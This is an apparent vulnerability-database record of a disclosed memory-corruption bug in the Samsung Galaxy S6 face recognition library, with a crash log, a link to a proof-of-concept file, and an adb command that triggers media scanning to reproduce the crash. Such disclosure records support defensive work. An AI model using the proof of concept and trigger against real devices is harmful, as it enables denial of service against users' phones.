ID
VAR-E-201602-0156
EDB ID
39425
TITLE
Samsung Galaxy S6 - 'android.media.process' 'MdConvertLine' Face Recognition Memory Corruption - Android dos Exploit
Trust: 0.6
DESCRIPTION
Samsung Galaxy S6 - 'android.media.process' 'MdConvertLine' Face Recognition Memory Corruption.. dos exploit for Android platform
Trust: 0.6
AFFECTED PRODUCTS
| vendor: | samsung | model: | galaxy s6 | scope: | - | version: | - | Trust: 1.6 |
EXPLOIT
Source: https://code.google.com/p/google-security-research/issues/detail?id=616
The attached file causes memory corruption when iy is scanned by the face recognition library in android.media.process
F/libc ( 4134): Fatal signal 11 (SIGSEGV), code 1, fault addr 0x33333333333358 in tid 12161 (syncThread)
I/DEBUG ( 3021): *** *** *** *** *** *** *** *** *** *** *** *** *** *** *** ***
I/DEBUG ( 3021): Build fingerprint: 'Verizon/zeroltevzw/zeroltevzw:5.1.1/LMY47X/G925VVRU4BOG9:user/release-keys'
I/DEBUG ( 3021): Revision: '10'
I/DEBUG ( 3021): ABI: 'arm64'
I/DEBUG ( 3021): pid: 4134, tid: 12161, name: syncThread >>> android.process.media <<<
I/DEBUG ( 3021): signal 11 (SIGSEGV), code 1 (SEGV_MAPERR), fault addr 0x33333333333358
I/DEBUG ( 3021): x0 3333333333333330 x1 0000007f714b6800 x2 000000000000001f x3 3333333333333330
I/DEBUG ( 3021): x4 0000007f817fedb8 x5 0000007f7c1f4ea8 x6 0000007f7c1f4ec0 x7 0000007f7c109680
I/DEBUG ( 3021): x8 304b333333333333 x9 3033330333000000 x10 3333333333333333 x11 0103304b33333333
I/DEBUG ( 3021): x12 0000040033300311 x13 0300035033333333 x14 0300303333233333 x15 0000000000001484
I/DEBUG ( 3021): x16 0000007f74bfe828 x17 0000007f8c086008 x18 0000007f8c13b830 x19 0000007f7c279a00
I/DEBUG ( 3021): x20 0000000000000000 x21 0000007f7c1036a0 x22 0000007f817ff440 x23 0000007f7c279a10
I/DEBUG ( 3021): x24 0000000032d231a0 x25 0000000000000065 x26 0000000032d28880 x27 0000000000000065
I/DEBUG ( 3021): x28 0000000000000000 x29 0000007f817fecb0 x30 0000007f740be014
I/DEBUG ( 3021): sp 0000007f817fecb0 pc 0000007f740cefdc pstate 0000000080000000
I/DEBUG ( 3021):
I/DEBUG ( 3021): backtrace:
I/DEBUG ( 3021): #00 pc 0000000000065fdc /system/lib64/libfacerecognition.so (MdConvertLine+28)
I/DEBUG ( 3021): #01 pc 0000000000055010 /system/lib64/libfacerecognition.so (MCC_Process+160)
To reproduce, download the attached file and wait, or trigger media scanning by calling:
adb shell am broadcast -a android.intent.action.MEDIA_MOUNTED -d file:///mnt/shell/emulated/0/
Proof of Concept:
https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39425.zip
Trust: 1.0
EXPLOIT LANGUAGE
txt
Trust: 0.6
PRICE
free
Trust: 0.6
TYPE
'android.media.process' 'MdConvertLine' Face Recognition Memory Corruption
Trust: 1.0
CREDITS
Google Security Research
Trust: 0.6
EXTERNAL IDS
| db: | EXPLOIT-DB | id: | 39425 | Trust: 1.6 |
| db: | EDBNET | id: | 60710 | Trust: 0.6 |
REFERENCES
| url: | https://code.google.com/p/google-security-research/issues/detail?id=616 | Trust: 1.0 |
| url: | https://www.exploit-db.com/exploits/39425/ | Trust: 0.6 |
SOURCES
| db: | EXPLOIT-DB | id: | 39425 |
| db: | EDBNET | id: | 60710 |
LAST UPDATE DATE
2022-07-27T09:32:35.040000+00:00
SOURCES RELEASE DATE
| db: | EXPLOIT-DB | id: | 39425 | date: | 2016-02-08T00:00:00 |
| db: | EDBNET | id: | 60710 | date: | 2016-02-08T00:00:00 |